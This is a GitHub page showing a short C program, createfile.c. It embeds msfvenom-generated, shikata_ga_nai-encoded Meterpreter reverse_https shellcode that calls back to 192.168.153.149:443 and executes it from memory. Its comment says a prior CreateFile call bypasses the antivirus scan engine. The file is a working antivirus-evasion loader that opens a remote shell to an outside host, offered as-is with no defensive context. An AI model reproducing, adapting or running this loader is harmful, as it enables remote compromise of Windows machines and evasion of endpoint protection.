-
Notifications
You must be signed in to change notification settings - Fork 30
/
Copy pathcreatefile.c
66 lines (61 loc) · 2.75 KB
/
createfile.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <windows.h>
#include <tchar.h>
#include <stdlib.h>
#include <strsafe.h>
void exec_shellcode(unsigned char *shellcode)
{
int (*funct)();
funct = (int (*)()) shellcode;
(int)(*funct)();
}
int main (int argc, char **argv)
{
/* msfvenom -p windows/meterpreter/reverse_https lhost=192.168.153.149 lport=443 -e x86/shikata_ga_nai -f c -a x86 --platform Windows
*/
unsigned char buffer[]=
"\xda\xcc\xba\x6f\x33\x72\xc4\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x75\x31\x56\x18\x83\xc6\x04\x03\x56\x7b\xd1\x87\x38\x6b\x97"
"\x68\xc1\x6b\xf8\xe1\x24\x5a\x38\x95\x2d\xcc\x88\xdd\x60\xe0"
"\x63\xb3\x90\x73\x01\x1c\x96\x34\xac\x7a\x99\xc5\x9d\xbf\xb8"
"\x45\xdc\x93\x1a\x74\x2f\xe6\x5b\xb1\x52\x0b\x09\x6a\x18\xbe"
"\xbe\x1f\x54\x03\x34\x53\x78\x03\xa9\x23\x7b\x22\x7c\x38\x22"
"\xe4\x7e\xed\x5e\xad\x98\xf2\x5b\x67\x12\xc0\x10\x76\xf2\x19"
"\xd8\xd5\x3b\x96\x2b\x27\x7b\x10\xd4\x52\x75\x63\x69\x65\x42"
"\x1e\xb5\xe0\x51\xb8\x3e\x52\xbe\x39\x92\x05\x35\x35\x5f\x41"
"\x11\x59\x5e\x86\x29\x65\xeb\x29\xfe\xec\xaf\x0d\xda\xb5\x74"
"\x2f\x7b\x13\xda\x50\x9b\xfc\x83\xf4\xd7\x10\xd7\x84\xb5\x7c"
"\x49\xf2\x31\x7c\xfd\x8b\xd0\x12\x94\x27\x4b\xa6\x11\xee\x8c"
"\xc9\x0b\xdf\x49\x66\xe7\x73\x3d\xdb\x6f\x4e\x97\xa2\xc8\x51"
"\xc2\x07\x44\xc4\xee\xf4\x39\x70\x4a\xfb\xbd\x80\x44\x03\xbd"
"\x80\x94\xdc\xd9\xec\xcc\x40\x5e\xa0\xa5\xee\xec\x4f\x46\xa1"
"\x46\x80\x9f\x6a\x21\xd8\x86\xc7\xfe\x59\x4b\xaf\x72\x1b\xf3"
"\x61\x22\xf8\x31\x17\xa2\xbf\x60\xa9\x1e\x05\xbc\x7f\x00\xcb"
"\x8b\x18\xe7\x87\x40\x93\x25\x61\x38\x2b\x23\x46\x84\xac\xc7"
"\xca\x3f\x7d\x6a\x5d\x12\xca\x01\x34\xf6\xb5\xb8\xd8\xa6\x3c"
"\x2c\x4f\x31\xd5\xc3\xec\xf1\x40\x74\xbe\x68\xe1\x3c\x29\x31"
"\x7f\xc7\xf0\x93\x25\x5f\x37\x2e\x90\xda\x51\x76\x43\xa2\xab"
"\xe5\x83\x7c\xbc\xbe\x0a\xe3\xfa\xbe\xd9\x95\xc5\x12\x89\xa5"
"\xfb\x74\xcd\xf5\xa8\x27\x9a\xaa\x18\xa0\xcf\x18\x8b\x0b\xf0"
"\x76\x45\x01\x04\x26\x02\x56\x2b\xd8\xd2\xdf\xab\xb2\xd6\x8f"
"\x41\x5c\x81\x47\xe0\x24\xb3\x1e\xf5\x7c\x98\x4d\x5a\x2c\x49"
"\x1a\x71\xd4\x6d\xa1\x76\x0d\x08\x95\xfd\xba\x7b\x9e\xee\xc2"
"\x7b\xf6\x54\x33\x4e\xe6\xab\x66\xfe\x93\x9e\x61\x4d\x5c\x20"
"\x72\x24\x1c\x48\x72\xa8\x9c\x88\x1a\xc8\x9c\xc8\xda\x9b\xf4"
"\x90\x7e\x48\xe0\xdf\xaa\xfc\xb9\x4c\xdc\xe4\x69\x1a\xde\xca"
"\x95\xda\x8d\x5c\xfe\xc8\xa7\xe8\x1c\x13\x12\x6f\x20\x9f\x52"
"\xfb\xa6\x5e\xae\x79\x68\x15\xd5\xda\xaa\x8a\xfd\xb0\xd3\xcb"
"\x01\x77\x15\x01\xd0\x49\x53\x5d\x02\x9b\xae\xae\x74\xea\xe4"
"\xe9\x88\xb7\xf5\xbc\x2b\x91\x9f\xbe\x78\xe1\xb5";
/*
Here is the bypass. A file is written, this bypasses the scan engine
*/
HANDLE hFile;
hFile= CreateFile(_T("hello.txt"), FILE_READ_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
exit(0);
exec_shellcode(buffer);
}